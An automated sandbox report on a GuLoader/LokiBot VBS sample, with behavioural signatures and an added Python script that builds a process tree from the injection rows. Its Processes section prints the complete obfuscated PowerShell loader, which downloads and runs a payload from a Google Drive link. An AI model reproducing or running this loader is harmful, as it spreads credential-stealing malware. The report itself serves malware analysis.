Malware Analysis Report

2025-04-03 09:48

Sample ID 240329-cmsnhafe22
Target 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
SHA256 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
Tags
guloader lokibot collection downloader spyware stealer trojan
score
10/10


Analysis Overview

score
10/10

SHA256

43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612

Threat Level: Known bad

The file 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

outlook_win_path

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported

2024-03-29 02:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-29 02:11

Reported

2024-03-29 02:14

Platform

win7-20240221-en

Max time kernel

156s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1756 set thread context of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1388 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1388 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
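The WriteProcessMemory and SetThreadContext rows above carry the whole execution chain of this detonation, but the report lists them flat and with repeats. The following is an added example, not part of the sandbox report or its tooling: it parses those rows into a parent/child tree and pulls out the hollowing chain (the WoW64 PowerShell setting the thread context of wab.exe). The rows are copied from the tables above as a constructed sample, duplicates included; the one assumption, taken from how this report lays the rows out rather than from any sandbox guarantee, is that the first "wrote to memory of" row from a PID to a previously unseen PID is the parent populating the child it just created, so it doubles as the process-creation edge. All function names are mine.

```python
import ntpath
import re
from collections import defaultdict

# Constructed sample input: rows copied from the behavioral1 "Suspicious use of
# WriteProcessMemory" and "Suspicious use of SetThreadContext" tables above.
# The report repeats rows; the duplicates are kept so parsing has to dedupe.
SIGNATURE_ROWS = r"""
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 set thread context of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
"""

# Description / Indicator(N/A) / Process / Target; both paths start with "C:\",
# so a non-greedy group followed by " C:\" splits Process from Target even when
# a path contains spaces ("Program Files (x86)\windows mail\wab.exe").
ROW = re.compile(r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (.+?) (C:\\.+)$")


def parse_rows(text):
    """Parse report rows into unique (src_pid, action, dst_pid, src_image, dst_image) tuples."""
    seen, events = set(), []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        src, action, dst, src_img, dst_img = m.groups()
        ev = (int(src), action, int(dst), src_img, dst_img)
        if ev not in seen:
            seen.add(ev)
            events.append(ev)
    return events


def build_tree(events):
    """Parent/child map derived from the WriteProcessMemory rows.

    Assumption (from this report's layout, not a sandbox guarantee): the first
    'wrote to memory of' row from one PID to a new PID is the parent writing the
    freshly created child's startup data, so it is used as the creation edge."""
    image, parent, children = {}, {}, defaultdict(list)
    for src, action, dst, src_img, dst_img in events:
        image.setdefault(src, src_img)
        image.setdefault(dst, dst_img)
        if action == "wrote to memory of" and dst not in parent:
            parent[dst] = src
            children[src].append(dst)
    return {"image": image, "parent": parent, "children": children}


def lineage(tree, pid):
    """PIDs from the root of the tree down to pid, inclusive."""
    chain = [pid]
    while chain[0] in tree["parent"]:
        chain.insert(0, tree["parent"][chain[0]])
    return chain


def injection_chains(events, tree):
    """Every SetThreadContext edge whose target image differs from the source image
    (a foreign process having its thread context rewritten, the hollowing indicator),
    returned with the injector's full ancestry prepended."""
    out = []
    for src, action, dst, src_img, dst_img in events:
        if action == "set thread context of" and src_img.lower() != dst_img.lower():
            out.append(lineage(tree, src) + [dst])
    return out


def render(tree, pid, depth=0):
    """Indented one-line-per-process view, Process Explorer style, as a list of lines."""
    path = tree["image"][pid]
    wow = " [WoW64]" if "syswow64" in path.lower() else ""
    lines = [f"{'  ' * depth}{ntpath.basename(path)} ({pid}){wow}"]
    for child in tree["children"].get(pid, []):
        lines.extend(render(tree, child, depth + 1))
    return lines


if __name__ == "__main__":
    evs = parse_rows(SIGNATURE_ROWS)
    tree = build_tree(evs)
    print("\n".join(render(tree, 2820)))
    for chain in injection_chains(evs, tree):
        print("hollowing chain:", " -> ".join(f"{ntpath.basename(tree['image'][p])}({p})" for p in chain))
```

The rendered tree is WScript.exe (2820) > powershell.exe (1388) > powershell.exe (1756) [WoW64] > wab.exe (2488), with the two cmd.exe children for the `set /A` trick, and the only hollowing chain ends at wab.exe: the 64-bit PowerShell re-launches the same script under SysWOW64 so that 32-bit shellcode can be staged into a 32-bit host, which is the GuLoader pattern the signatures above describe.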

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt 
Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. 
ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise 
Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"
